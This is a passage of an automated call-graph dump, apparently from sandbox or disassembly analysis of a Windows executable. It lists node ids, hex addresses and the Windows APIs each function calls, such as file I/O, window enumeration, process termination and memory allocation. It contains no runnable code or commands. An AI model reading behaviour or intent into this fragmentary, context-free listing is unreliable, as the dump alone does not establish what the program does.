library calls 117656->117693 117691 ba68f9 92 API calls 117659->117691 117675 b26c90 117662->117675 117692 ba6da0 92 API calls 2 library calls 117662->117692 117666 b66938 117666->117666 117667 b22236 39 API calls 117667->117676 117670 b26cbe 117671 b66881 117696 ba67ce 81 API calls 117671->117696 117674 b21d83 39 API calls 117674->117676 117675->117670 117697 b94358 81 API calls __wsopen_s 117675->117697 117676->117667 117676->117670 117676->117671 117676->117674 117676->117675 117680 b21ed0 39 API calls 117676->117680 117681 b2fbc8 21 API calls 117676->117681 117683 b21d11 39 API calls 117676->117683 117684 b267dc 81 API calls 117676->117684 117685 b40854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 117676->117685 117686 b235b5 21 API calls 117676->117686 117687 b406d4 28 API calls __onexit 117676->117687 117688 b4080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 117676->117688 117689 b26760 81 API calls 117676->117689 117690 b265f1 81 API calls 117676->117690 117694 b23574 21 API calls 117676->117694 117695 b80763 21 API calls 117676->117695 117680->117676 117681->117676 117683->117676 117684->117676 117685->117676 117686->117676 117687->117676 117688->117676 117689->117676 117690->117676 117691->117662 117692->117675 117693->117676 117694->117676 117695->117676 117696->117675 117697->117666 119687 b695d9 119688 b695e7 119687->119688 119691 b29d61 messages 119687->119691 119689 b29e13 119690 b29dfc messages 119690->119689 119702 b224c6 21 API calls messages 119690->119702 119691->119690 119694 b21dd1 119691->119694 119695 b21ddf 119694->119695 119700 b21e07 messages 119694->119700 119696 b21ded 119695->119696 119697 b21dd1 21 API calls 119695->119697 119698 b21df3 119696->119698 119699 b21dd1 21 API calls 119696->119699 119697->119696 119698->119700 119703 b23490 21 API calls messages 119698->119703 119699->119698 119700->119690 119702->119690 119703->119700 117698 b62fa7 117699 b4042b 21 API calls 117698->117699 117700 b62fae 117699->117700 117701 b62fc7 __fread_nolock 117700->117701 117702 b4045b 21 API calls 117700->117702 117703 b4045b 21 API calls 117701->117703 117702->117701 117704 b62fec 117703->117704 119704 b63644 119715 b21b4d 119704->119715 119706 b6365a 119711 b636d3 119706->119711 119724 b2362b 22 API calls 119706->119724 119709 b636b3 119709->119711 119725 b92823 21 API calls 119709->119725 119712 b64248 119711->119712 119726 b94358 81 API calls __wsopen_s 119711->119726 119727 b94358 81 API calls __wsopen_s 119712->119727 119714 b643d3 119714->119714 119716 b21b5b 119715->119716 119717 b21b6e 119715->119717 119728 b23574 21 API calls 119716->119728 119719 b21b73 119717->119719 119720 b21ba1 119717->119720 119721 b4042b 21 API calls 119719->119721 119729 b23574 21 API calls 119720->119729 119723 b21b65 119721->119723 119723->119706 119724->119709 119725->119711 119726->119712 119727->119714 119728->119723 119729->119723 117705 13f0029 117706 13f003e 117705->117706 117707 13f0051 117705->117707 117734 13ef245 RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 117706->117734 117708 13f0068 RtlEnterCriticalSection 117707->117708 117709 13f0072 117707->117709 117708->117709 117721 13efe25 13 API calls 117709->117721 117712 13f0043 117712->117707 117714 13f0047 117712->117714 117713 13f007b 117718 13f007f 117713->117718 117722 13efaa1 117713->117722 117716 13f00d7 RtlLeaveCriticalSection 117717 13f00e1 117716->117717 117718->117716 117718->117717 117719 13f008b 117719->117718 117735 13efc4d 9 API calls 117719->117735 117721->117713 117723 13efabc 117722->117723 117724 13efab3 117722->117724 117727 13efae5 RtlEnterCriticalSection 117723->117727 117728 13efaef 117723->117728 117729 13efac4 117723->117729 117742 13ef245 RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 117724->117742 117726 13efab8 117726->117723 117726->117729 117727->117728 117728->117729 117736 13ef959 117728->117736 117729->117719 117732 13efc3c 117732->117719 117733 13efc32 RtlLeaveCriticalSection 117733->117732 117734->117712 117735->117718 117737 13ef970 117736->117737 117738 13ef9b1 117737->117738 117741 13ef9d8 117737->117741 117743 13ef8c1 117737->117743 117738->117741 117748 13ef6f1 117738->117748 117741->117732 117741->117733 117742->117726 117752 13eefc5 117743->117752 117745 13ef8d1 117746 13ef8de 117745->117746 117761 13ef835 9 API calls 117745->117761 117746->117737 117749 13ef78c 117748->117749 117751 13ef716 117748->117751 117749->117751 117777 13ef635 117749->117777 117751->117741 117757 13eefe3 117752->117757 117753 13eeff1 117762 13eee49 117753->117762 117757->117753 117758 13ef051 117757->117758 117759 13eefff 117757->117759 117766 13eeca5 117757->117766 117774 13eeb59 LocalAlloc 117757->117774 117775 13eed81 VirtualFree 117758->117775 117759->117745 117761->117746 117764 13eee9c 117762->117764 117763 13eeeeb 117763->117759 117764->117763 117765 13eeed2 VirtualAlloc 117764->117765 117765->117763 117765->117764 117767 13eecb4 VirtualAlloc 117766->117767 117769 13eed04 117767->117769 117770 13eece1 117767->117770 117769->117757 117776 13eeac9 LocalAlloc 117770->117776 117772 13eeced 117772->117769 117773 13eecf1 VirtualFree 117772->117773 117773->117769 117774->117757 117775->117759 117776->117772 117778 13ef649 117777->117778 117779 13ef6e5 117778->117779 117780 13ef697 117778->117780 117781 13ef681 117778->117781 117779->117751 117783 13ef1b1 3 API calls 117780->117783 117790 13ef1b1 117781->117790 117784 13ef695 117783->117784 117784->117779 117800 13ef4f5 9 API calls 117784->117800 117786 13ef6b8 117787 13ef6da 117786->117787 117801 13ef555 9 API calls 117786->117801 117802 13eebe1 LocalAlloc 117787->117802 117791 13ef238 117790->117791 117792 13ef1db 117790->117792 117791->117784 117803 13eef09 117792->117803 117796 13ef1fc 117797 13ef213 117796->117797 117808 13eed81 VirtualFree 117796->117808 117797->117791 117809 13eebe1 LocalAlloc 117797->117809 117800->117786 117801->117787 117802->117779 117804 13eef5a 117803->117804 117805 13eefbb 117804->117805 117806 13eef8c VirtualFree 117804->117806 117807 13eeb59 LocalAlloc 117805->117807 117806->117804 117807->117796 117808->117797 117809->117791 119730 b21044 119735 b2921a 119730->119735 119772 b3f70a 119735->119772 119739 b29291 119740 b2f38f 21 API calls 119739->119740 119741 b2929b 119740->119741 119742 b2f38f 21 API calls 119741->119742 119743 b292a5 119742->119743 119744 b2f38f 21 API calls 119743->119744 119745 b292af 119744->119745 119746 b2f38f 21 API calls 119745->119746 119747 b292ed 119746->119747 119748 b2f38f 21 API calls 119747->119748 119749 b293b9 119748->119749 119782 b3fb30 119749->119782 119818 b3f7cf 119772->119818 119775 b3f7cf 21 API calls 119776 b3f742 119775->119776 119777 b2f38f 21 API calls 119776->119777 119778 b3f74e 119777->119778 119779 b2f82c 21 API calls 119778->119779 119780 b29250 119779->119780 119781 b3f9fb 6 API calls 119780->119781 119781->119739 119783 b2f38f 21 API calls 119782->119783 119784 b3fb40 119783->119784 119785 b2f38f 21 API calls 119784->119785 119786 b3fb48 119785->119786 119825 b2f2ae 119786->119825 119789 b2f2ae 21 API calls 119790 b3fb58 119789->119790 119791 b2f38f 21 API calls 119790->119791 119792 b3fb63 119791->119792 119793 b4042b 21 API calls 119792->119793 119794 b293c3 119793->119794 119795 b3f508 119794->119795 119796 b3f516 119795->119796 119797 b2f38f 21 API calls 119796->119797 119798 b3f521 119797->119798 119799 b2f38f 21 API calls 119798->119799 119800 b3f52c 119799->119800 119801 b2f38f 21 API calls 119800->119801 119802 b3f537 119801->119802 119803 b2f38f 21 API calls 119802->119803 119804 b3f542 119803->119804 119805 b2f2ae 21 API calls 119804->119805 119819 b2f38f 21 API calls 119818->119819 119820 b3f7da 119819->119820 119821 b2f38f 21 API calls 119820->119821 119822 b3f7e2 119821->119822 119823 b2f38f 21 API calls 119822->119823 119824 b3f738 119823->119824 119824->119775 119826 b2f38f 21 API calls 119825->119826 119827 b2f2b6 119826->119827 119827->119789 117810 b6362f 117847 b242e9 __fread_nolock messages 117810->117847 117811 b246c6 118005 b94358 81 API calls __wsopen_s 117811->118005 117813 b643d3 117813->117813 117814 b23713 117814->117811 117815 b2376c 117814->117815 117823 b23c35 messages 117814->117823 117815->117811 117832 b237a6 messages 117815->117832 117816 b2fbc8 21 API calls 117816->117847 117817 b24887 117824 b63cef 117817->117824 117828 b237bc messages 117817->117828 117817->117832 117818 b2415b 117819 b4042b 21 API calls 117818->117819 117819->117832 117823->117817 117823->117818 117823->117832 117827 b2fbc8 21 API calls 117824->117827 117824->117828 117826 b2fbc8 21 API calls 117826->117832 117827->117828 117829 b2fa3b 21 API calls 117829->117847 117832->117826 117832->117828 117834 b641a4 118000 b94358 81 API calls __wsopen_s 117834->118000 117837 b641b7 118004 b7ff7d 21 API calls 117837->118004 117838 b4042b 21 API calls 117838->117847 117839 b641c5 118001 b94358 81 API calls __wsopen_s 117839->118001 117840 b4045b 21 API calls 117840->117847 117842 b35eb0 9 API calls 117842->117847 117843 b641d7 118002 b7ff7d 21 API calls 117843->118002 117846 b635b9 118003 b94358 81 API calls __wsopen_s 117846->118003 117847->117811 117847->117814 117847->117816 117847->117829 117847->117834 117847->117837 117847->117838 117847->117839 117847->117840 117847->117842 117847->117846 117851 b9fc5b 85 API calls 117847->117851 117856 b2bfa2 117847->117856 117913 b97efb 117847->117913 117968 baa943 117847->117968 117976 b3174b 117847->117976 117980 baa545 117847->117980 117986 b92bf2 117847->117986 117990 ba9f7b 117847->117990 117993 b23574 21 API calls 117847->117993 117994 b2914c 93 API calls 117847->117994 117995 b91e7c 21 API calls 117847->117995 117996 b40854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 117847->117996 117997 b4080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 117847->117997 117998 ba7c74 165 API calls 117847->117998 117999 b7ff7d 21 API calls 117847->117999 117851->117847 117857 b232c3 21 API calls 117856->117857 117858 b2bfba 117857->117858 117859 b4042b 21 API calls 117858->117859 117863 b6b542 117858->117863 117861 b2bfd3 117859->117861 117862 b4045b 21 API calls 117861->117862 117864 b2bfe4 117862->117864 117904 b2c04c 117863->117904 118037 b9a7ef 38 API calls 117863->118037 118018 b31ebe 117864->118018 117867 b2334c 38 API calls 117868 b6b5a4 117867->117868 117870 b6b5ac 117868->117870 117871 b2c059 117868->117871 117869 b2f38f 21 API calls 117872 b2bff7 117869->117872 117873 b2334c 38 API calls 117870->117873 118031 b31dcc SetFilePointerEx SetFilePointerEx SetFilePointerEx 117871->118031 117874 b31ebe CloseHandle 117872->117874 117880 b2c060 117873->117880 117876 b2bffe 117874->117876 117877 b2304c 52 API calls 117876->117877 117878 b2c00a 117877->117878 117879 b31ebe CloseHandle 117878->117879 117883 b2c014 117879->117883 117881 b6b5c1 117880->117881 117882 b2c07a 117880->117882 117885 b4045b 21 API calls 117881->117885 117886 b2f38f 21 API calls 117882->117886 118022 b31ee8 117883->118022 117889 b6b5c7 117885->117889 117887 b2c082 117886->117887 118032 b31af9 27 API calls 117887->118032 117897 b6b5db 117889->117897 118006 b31762 117889->118006 117890 b6b53a 118036 b317cc CloseHandle messages 117890->118036 117894 b2c091 117901 b6b5df __fread_nolock 117894->117901 118033 b2326c 21 API calls 117894->118033 117895 b2c02d 118030 b31bb6 26 API calls messages 117895->118030 117897->117901 118009 b91c03 117897->118009 117900 b2c03b 117902 b3174b 3 API calls 117900->117902 117906 b2c042 117902->117906 117903 b2c0a5 117907 b2c0df 117903->117907 117908 b31ebe CloseHandle 117903->117908 117904->117867 117904->117871 117905 b6b503 118035 b8daab SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 117905->118035 117906->117904 117906->117905 117907->117847 117909 b2c0d3 117908->117909 117909->117907 118034 b317cc CloseHandle messages 117909->118034 117911 b6b51a 117911->117904 117914 b97f25 117913->117914 117915 b97f1a 117913->117915 117919 b2f38f 21 API calls 117914->117919 117956 b9800b 117914->117956 117916 b2334c 38 API calls 117915->117916 117916->117914 117917 b4042b 21 API calls 117918 b9803e 117917->117918 117920 b4045b 21 API calls 117918->117920 117921 b97f46 117919->117921 117922 b9804f 117920->117922 117923 b2f38f 21 API calls 117921->117923 117925 b31ebe CloseHandle 117922->117925 117924 b97f4f 117923->117924 117926 b2304c 52 API calls 117924->117926 117927 b9805a 117925->117927 117928 b97f5b 117926->117928 117929 b2f38f 21 API calls 117927->117929 118049 b211ef 21 API calls 117928->118049 117931 b98062 117929->117931 117933 b31ebe CloseHandle 117931->117933 117932 b97f70 117934 b2f78e 21 API calls 117932->117934 117935 b98069 117933->117935 117936 b97fa3 117934->117936 117937 b2304c 52 API calls 117935->117937 117938 b97faa 117936->117938 117940 b98001 117936->117940 117939 b98075 117937->117939 118050 b8e9ba GetFileAttributesW FindFirstFileW FindClose 117938->118050 117942 b31ebe CloseHandle 117939->117942 117943 b2334c 38 API calls 117940->117943 117945 b9807f 117942->117945 117943->117956 117944 b97fb3 117944->117940 117947 b2fa3b 21 API calls 117944->117947 117946 b31ee8 5 API calls 117945->117946 117948 b98099 117946->117948 117949 b97fca 117947->117949 117950 b980a1 117948->117950 117951 b98195 GetLastError 117948->117951 118051 b8e098 25 API calls 117949->118051 118052 b31bb6 26 API calls messages 117950->118052 117953 b981ae 117951->117953 118054 b317cc CloseHandle messages 117953->118054 117956->117917 117967 b9813d 117956->117967 117957 b97fd3 117957->117940 117958 b980af 117959 b3174b 3 API calls 117958->117959 117962 b980b6 117959->117962 117960 b980fc 117961 b4042b 21 API calls 117960->117961 117964 b98130 117961->117964 117962->117960 117963 b980d0 117962->117963 118053 b8daab SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 117963->118053 117966 b2f38f 21 API calls 117964->117966 117966->117967 117967->117847 117969 baa99f 117968->117969 117975 baa95f 117968->117975 117970 b2334c 38 API calls 117969->117970 117971 baa9bf 117969->117971 117970->117971 117972 b2334c 38 API calls 117971->117972 117973 baaa27 117971->117973 117971->117975 117972->117973 118055 b90815 117973->118055 117975->117847 117977 b31761 117976->117977 117978 b31754 117976->117978 117977->117847 117979 b31cf6 3 API calls 117978->117979 117979->117977 117984 baa558 117980->117984 117981 b2304c 52 API calls 117982 baa5c5 117981->117982 118096 b91c68 117982->118096 117984->117981 117985 baa567 117984->117985 117985->117847 117987 b92bfb 117986->117987 117989 b92c00 117986->117989 118140 b91ce5 117987->118140 117989->117847 118174 ba8974 117990->118174 117992 ba9f8b 117992->117847 117993->117847 117994->117847 117995->117847 117996->117847 117997->117847 117998->117847 117999->117847 118000->117837 118001->117843 118002->117811 118003->117837 118004->117811 118005->117813 118038 b31e10 118006->118038 118010 b91c0e 118009->118010 118011 b4042b 21 API calls 118010->118011 118012 b91c15 118011->118012 118013 b91c21 118012->118013 118014 b91c42 118012->118014 118015 b4045b 21 API calls 118013->118015 118016 b4045b 21 API calls 118014->118016 118017 b91c2a ___scrt_get_show_window_mode 118015->118017 118016->118017 118017->117901 118019 b31ed7 118018->118019 118020 b2bfef 118018->118020 118019->118020 118021 b31edc CloseHandle 118019->118021 118020->117869 118021->118020 118023 b77466 118022->118023 118024 b31eff CreateFileW 118022->118024 118025 b2c025 118023->118025 118026 b7746c CreateFileW 118023->118026 118024->118025 118025->117890 118025->117895 118026->118025 118027 b77494 118026->118027 118043 b31cf6 118027->118043 118030->117900 118031->117880 118032->117894 118033->117903 118034->117907 118035->117911 118036->117863 118037->117863 118039 b31e8d SetFilePointerEx 118038->118039 118042 b31e21 118038->118042 118039->118042 118040 b31773 118040->117897 118041 b31e5e ReadFile 118041->118040 118041->118042 118042->118040 118042->118041 118044 b31d0d 118043->118044 118045 b31d96 SetFilePointerEx SetFilePointerEx 118044->118045 118046 b77440 SetFilePointerEx 118044->118046 118047 b7742f 118044->118047 118048 b31d60 118044->118048 118045->118048 118047->118046 118048->118025 118049->117932 118050->117944 118051->117957 118052->117958 118053->117960 118054->117967 118088 b9074d 52 API calls _strftime 118055->118088 118057 b90834 118058 b908ae 118057->118058 118059 b90896 118057->118059 118080 b9083a __fread_nolock 118057->118080 118061 b90921 118058->118061 118064 b90918 118058->118064 118069 b908cb 118058->118069 118089 b90a92 56 API calls __fread_nolock 118059->118089 118062 b909b9 118061->118062 118063 b90953 118061->118063 118061->118080 118067 b90a59 118062->118067 118068 b909c2 118062->118068 118065 b90958 118063->118065 118066 b90983 118063->118066 118064->118061 118087 b908ff 118064->118087 118065->118080 118090 b233b0 38 API calls 118065->118090 118066->118080 118091 b233b0 38 API calls 118066->118091 118067->118080 118095 b23400 38 API calls 118067->118095 118070 b90a38 118068->118070 118071 b909c7 118068->118071 118072 b92bf2 23 API calls 118069->118072 118070->118080 118094 b23400 38 API calls 118070->118094 118076 b909cd 118071->118076 118077 b90a06 118071->118077 118082 b908d3 118072->118082 118075 b91c03 21 API calls 118075->118080 118076->118080 118092 b23400 38 API calls 118076->118092 118077->118080 118093 b23400 38 API calls 118077->118093 118080->117975 118084 b92bf2 23 API calls 118082->118084 118085 b908ea __fread_nolock 118084->118085 118086 b92bf2 23 API calls 118085->118086 118086->118087 118087->118075 118088->118057 118089->118080 118090->118080 118091->118080 118092->118080 118093->118080 118094->118080 118095->118080 118097 b91c75 118096->118097 118098 b4042b 21 API calls 118097->118098 118099 b91c7c 118098->118099 118102 b90156 118099->118102 118101 b91cb6 118101->117985 118103 b2faa1 21 API calls 118102->118103 118104 b90169 CharLowerBuffW 118103->118104 118106 b9017c 118104->118106 118105 b901ba 118108 b901cc 118105->118108 118135 b2f6ad 118105->118135 118106->118105 118107 b2f6ad 21 API calls 118106->118107 118119 b90186 ___scrt_get_show_window_mode 118106->118119 118107->118106 118110 b4045b 21 API calls 118108->118110 118113 b901fa 118110->118113 118115 b9021c 118113->118115 118138 b9008e 21 API calls 118113->118138 118114 b90259 118116 b4042b 21 API calls 118114->118116 118114->118119 118120 b902af 118115->118120 118117 b90273 118116->118117 118118 b4045b 21 API calls 118117->118118 118118->118119 118119->118101 118121 b2f38f 21 API calls 118120->118121 118122 b902e1 118121->118122 118123 b2f38f 21 API calls 118122->118123 118124 b902ea 118123->118124 118125 b2f38f 21 API calls 118124->118125 118131 b902f3 118125->118131 118126 b2f82c 21 API calls 118126->118131 118127 b462b3 GetStringTypeW 118127->118131 118129 b461fc 38 API calls 118129->118131 118130 b902af 40 API calls 118130->118131 118131->118126 118131->118127 118131->118129 118131->118130 118132 b905b7 118131->118132 118133 b2f5c0 21 API calls 118131->118133 118134 b2fbc8 21 API calls 118131->118134 118139 b462dd GetStringTypeW _strftime 118131->118139 118132->118114 118133->118131 118134->118131 118136 b2faa1 21 API calls 118135->118136 118137 b2f6b8 118136->118137 118137->118108 118138->118113 118139->118131 118141 b91cfc 118140->118141 118156 b91e15 118140->118156 118142 b91d1c 118141->118142 118143 b91d49 118141->118143 118145 b91d60 118141->118145 118142->118143 118148 b91d30 118142->118148 118144 b4045b 21 API calls 118143->118144 118149 b91d3e __fread_nolock 118144->118149 118146 b4045b 21 API calls 118145->118146 118157 b91d7d 118145->118157 118146->118157 118147 b91da4 118150 b4045b 21 API calls 118147->118150 118151 b4045b 21 API calls 118148->118151 118152 b4042b 21 API calls 118149->118152 118153 b91daa 118150->118153 118151->118149 118152->118156 118159 b919fa 118153->118159 118156->117989 118157->118147 118157->118148 118157->118149 118160 b4045b 21 API calls 118159->118160 118161 b91a11 118160->118161 118162 b4042b 21 API calls 118161->118162 118163 b91a1d 118162->118163 118164 b400d3 WideCharToMultiByte 118163->118164 118165 b40136 118164->118165 118166 b400fd 118164->118166 118173 b31f2a 21 API calls 118165->118173 118167 b4045b 21 API calls 118166->118167 118169 b40104 WideCharToMultiByte 118167->118169 118172 b31f87 21 API calls __fread_nolock 118169->118172 118171 b40128 118171->118149 118172->118171 118173->118171 118175 b2304c 52 API calls 118174->118175 118176 ba89ab 118175->118176 118200 ba89f0 messages 118176->118200 118211 ba96f4 118176->118211 118178 ba8c9c 118179 ba8e6a 118178->118179 118182 ba8caa 118178->118182 118260 ba98c8 59 API calls 118179->118260 118181 ba8e79 118181->118182 118183 ba8e85 118181->118183 118224 ba88a1 118182->118224 118183->118200 118184 b2304c 52 API calls 118202 ba8a64 118184->118202 118189 ba8ce3 118239 b402c0 118189->118239 118192 ba8d1d 118245 b22b1f 118192->118245 118193 ba8d03 118244 b94358 81 API calls __wsopen_s 118193->118244 118196 ba8d0e GetCurrentProcess TerminateProcess 118196->118192 118200->117992 118202->118178 118202->118184 118202->118200 118243 ba8f38 41 API calls _strftime 118202->118243 118203 ba8ee0 118203->118200 118205 ba8ef4 FreeLibrary 118203->118205 118204 ba8d5c 118257 ba9598 75 API calls 118204->118257 118205->118200 118210 ba8d6d 118210->118203 118258 b22510 21 API calls 118210->118258 118259 b23574 21 API calls 118210->118259 118261 ba9598 75 API calls 118210->118261 118212 b2faa1 21 API calls 118211->118212 118213 ba9711 CharLowerBuffW 118212->118213 118262 b89d33 118213->118262 118217 b2f38f 21 API calls 118218 ba974d 118217->118218 118269 b2f4fe 21 API calls __fread_nolock 118218->118269 118220 ba9761 118221 b2f9a0 21 API calls 118220->118221 118222 ba976b _wcslen 118221->118222 118223 ba9866 _wcslen 118222->118223 118270 ba8f38 41 API calls _strftime 118222->118270 118223->118202 118225 ba88bc 118224->118225 118229 ba8907 118224->118229 118226 b4045b 21 API calls 118225->118226 118228 ba88de 118226->118228 118227 b4042b 21 API calls 118227->118228 118228->118227 118228->118229 118230 ba9a7c 118229->118230 118231 ba9c95 messages 118230->118231 118238 ba9aa0 _strcat _wcslen 118230->118238 118231->118189 118232 b2334c 38 API calls 118232->118238 118233 b23400 38 API calls 118233->118238 118234 b233b0 38 API calls 118234->118238 118235 b4e8ac 20 API calls ___std_exception_copy 118235->118238 118236 b2304c 52 API calls 118236->118238 118238->118231 118238->118232 118238->118233 118238->118234 118238->118235 118238->118236 118273 b8fe37 23 API calls _wcslen 118238->118273 118240 b402d5 118239->118240 118241 b4036d EnumWindows 118240->118241 118242 b4033b 118240->118242 118241->118242 118242->118192 118242->118193 118243->118202 118244->118196 118246 b22b27 118245->118246 118247 b4042b 21 API calls 118246->118247 118248 b22b35 118247->118248 118274 b22a2a 118248->118274 118251 b22830 118277 b22940 118251->118277 118253 b4045b 21 API calls 118255 b228d8 118253->118255 118254 b22840 118254->118253 118254->118255 118255->118210 118256 b22510 21 API calls 118255->118256 118256->118204 118257->118210 118258->118210 118259->118210 118260->118181 118261->118210 118263 b89d53 _wcslen 118262->118263 118264 b89d92 118263->118264 118267 b89d88 118263->118267 118268 b89e4a 118263->118268 118264->118217 118264->118222 118267->118264 118271 b2f577 40 API calls 118267->118271 118268->118264 118272 b2f577 40 API calls 118268->118272 118269->118220 118270->118223 118271->118267 118272->118268 118273->118238 118275 b4042b 21 API calls 118274->118275 118276 b22a37 118275->118276 118276->118251 118278 b2294d 118277->118278 118279 b629e7 118278->118279 118284 b22957 messages 118278->118284 118280 b4042b 21 API calls 118279->118280 118282 b629f6 118280->118282 118281 b2295e 118281->118254 118284->118281 118285 b23490 21 API calls messages 118284->118285 118285->118284 118286 b33aa8 GetForegroundWindow 118287 b34e5a GetWindowLongW 118286->118287 118288 b33abc 118287->118288 118289 b33ad5 118288->118289 118290 b34b74 26 API calls 118288->118290 118290->118289 118291 b6872d 118295 b7fed5 118291->118295 118293 b68738 118294 b7fed5 52 API calls 118293->118294 118294->118293 118301 b7ff0f 118295->118301 118303 b7fee2 118295->118303 118296 b7ff11 118307 b22b69 52 API calls 118296->118307 118298 b7ff16 118299 b2304c 52 API calls 118298->118299 118300 b7ff1d 118299->118300 118302 b2f78e 21 API calls 118300->118302 118301->118293 118302->118301 118303->118296 118303->118298 118303->118301 118304 b7ff09 118303->118304 118306 b22df0 38 API calls _wcsstr 118304->118306 118306->118301 118307->118298 119830 b27dcc 119833 b27070 119830->119833 119832 b27dd7 119834 b270e9 119833->119834 119837 b27509 119833->119837 119835 b274f3 119834->119835 119836 b2710c 119834->119836 119918 b22236 39 API calls 119835->119918 119836->119837 119907 b21ed0 119836->119907 119938 b94358 81 API calls __wsopen_s 119837->119938 119841 b675a2 119841->119832 119842 b27308 119845 b2334c 38 API calls 119842->119845 119843 b27490 119844 b21d83 39 API calls 119843->119844 119844->119842 119850 b27368 119845->119850 119847 b27127 119847->119837 119847->119842 119847->119843 119851 b27176 119847->119851 119853 b2740b 119847->119853 119919 b80202 81 API calls 119847->119919 119920 b26394 92 API calls 119847->119920 119849 b67507 119935 ba62ca 21 API calls 119849->119935 119850->119849 119850->119853 119859 b67465 119850->119859 119860 b2737e 119850->119860 119851->119837 119851->119853 119854 b27187 119851->119854 119855 b6721e 119851->119855 119856 b67279 119851->119856 119871 b6720c 119851->119871 119852 b67505 119937 b21caa 21 API calls 119852->119937 119853->119832 119854->119837 119854->119853 119863 b2fbc8 21 API calls 119854->119863 119884 b271ba 119854->119884 119858 b672b6 119855->119858 119921 b22510 21 API calls 119855->119921 119856->119854 119856->119858 119923 b8c409 21 API calls 119856->119923 119861 b232c3 21 API calls 119858->119861 119932 ba5123 77 API calls ___scrt_get_show_window_mode 119859->119932 119860->119849 119860->119852 119916 b2236b 53 API calls 119860->119916 119861->119854 119863->119884 119866 b67274 119924 b23574 21 API calls 119866->119924 119868 b273c3 119868->119849 119872 b67532 119868->119872 119917 b2236b 53 API calls 119868->119917 119869 b674a2 119875 b674f0 119869->119875 119876 b674b0 119869->119876 119925 b23574 21 API calls 119871->119925 119936 b2236b 53 API calls 119872->119936 119933 b23574 21 API calls 119875->119933 119881 b232c3 21 API calls 119876->119881 119877 b67263 119877->119858 119922 b22510 21 API calls 119877->119922 119880 b273df 119880->119849 119880->119852 119887 b27404 119880->119887 119881->119853 119884->119837 119884->119853 119890 b27232 119884->119890 119926 b23574 21 API calls 119884->119926 119885 b674f9 119934 b23574 21 API calls 119885->119934 119888 b4042b 21 API calls 119887->119888 119888->119853 119892 b673c1 119890->119892 119894 b27272 119890->119894 119891 b673de 119929 b22c6f 38 API calls 119891->119929 119893 b673d4 119892->119893 119927 b22c6f 38 API calls 119892->119927 119928 b22be0 38 API calls 119893->119928 119894->119837 119894->119843 119894->119891 119898 b272ae 119894->119898 119898->119891 119899 b272c5 119898->119899 119901 b272ca 119898->119901 119915 b22be0 38 API calls 119899->119915 119902 b272f4 119901->119902 119903 b67421 119901->119903 119902->119837 119902->119842 119904 b67435 119903->119904 119930 b22c6f 38 API calls 119903->119930 119931 b22be0 38 API calls 119904->119931 119908 b22117 119907->119908 119913 b21ee3 119907->119913 119908->119847 119910 b2f38f 21 API calls 119910->119913 119911 b21f8d 119911->119847 119913->119910 119913->119911 119939 b40854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 119913->119939 119940 b406d4 28 API calls __onexit 119913->119940 119941 b4080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 119913->119941 119915->119901 119916->119868 119917->119880 119918->119837 119919->119847 119920->119847 119921->119877 119922->119866 119923->119866 119924->119871 119925->119858 119926->119890 119927->119893 119928->119891 119929->119901 119930->119904 119931->119837 119932->119869 119933->119885 119934->119852 119935->119872 119936->119852 119937->119853 119938->119841 119939->119913 119940->119913 119941->119913 118308 b58f2a 118309 b58f37 118308->118309 118313 b58f4f 118308->118313 118365 b526cc 19 API calls __dosmaperr 118309->118365 118311 b58f3c 118366 b52610 25 API calls pre_c_initialization 118311->118366 118314 b58faa 118313->118314 118322 b58f47 118313->118322 118367 b5fc75 20 API calls 2 library calls 118313->118367 118328 b4d7f5 118314->118328 118317 b58fc2 118335 b58a62 118317->118335 118319 b58fc9 118320 b4d7f5 __fread_nolock 25 API calls 118319->118320 118319->118322 118321 b58ff5 118320->118321 118321->118322 118323 b4d7f5 __fread_nolock 25 API calls 118321->118323 118324 b59003 118323->118324 118324->118322 118325 b4d7f5 __fread_nolock 25 API calls 118324->118325 118326 b59013 118325->118326 118327 b4d7f5 __fread_nolock 25 API calls 118326->118327 118327->118322 118329 b4d816 118328->118329 118330 b4d801 118328->118330 118329->118317 118368 b526cc 19 API calls __dosmaperr 118330->118368 118332 b4d806 118369 b52610 25 API calls pre_c_initialization 118332->118369 118334 b4d811 118334->118317 118336 b58a6e ___scrt_is_nonwritable_in_current_image 118335->118336 118337 b58a76 118336->118337 118340 b58a8e 118336->118340 118436 b526b9 19 API calls __dosmaperr 118337->118436 118339 b58b54 118443 b526b9 19 API calls __dosmaperr 118339->118443 118340->118339 118345 b58ac7 118340->118345 118342 b58a7b 118437 b526cc 19 API calls __dosmaperr 118342->118437 118343 b58b59 118444 b526cc 19 API calls __dosmaperr 118343->118444 118347 b58ad6 118345->118347 118348 b58aeb 118345->118348 118438 b526b9 19 API calls __dosmaperr 118347->118438 118370 b54f73 EnterCriticalSection 118348->118370 118350 b58ae3 118445 b52610 25 API calls pre_c_initialization 118350->118445 118352 b58af1 118355 b58b22 118352->118355 118356 b58b0d 118352->118356 118353 b58adb 118439 b526cc 19 API calls __dosmaperr 118353->118439 118371 b58b75 118355->118371 118440 b526cc 19 API calls __dosmaperr 118356->118440 118358 b58a83 ___scrt_is_nonwritable_in_current_image 118358->118319 118361 b58b12 118441 b526b9 19 API calls __dosmaperr 118361->118441 118362 b58b1d 118442 b58b4c LeaveCriticalSection __wsopen_s 118362->118442 118365->118311 118366->118322 118367->118314 118368->118332 118369->118334 118370->118352 118372 b58b87 118371->118372 118373 b58b9f 118371->118373 118455 b526b9 19 API calls __dosmaperr 118372->118455 118374 b58f09 118373->118374 118379 b58be4 118373->118379 118478 b526b9 19 API calls __dosmaperr 118374->118478 118376 b58b8c 118456 b526cc 19 API calls __dosmaperr 118376->118456 118378 b58f0e 118479 b526cc 19 API calls __dosmaperr 118378->118479 118381 b58b94 118379->118381 118383 b58bef 118379->118383 118388 b58c1f 118379->118388 118381->118362 118457 b526b9 19 API calls __dosmaperr 118383->118457 118385 b58bf4 118458 b526cc 19 API calls __dosmaperr 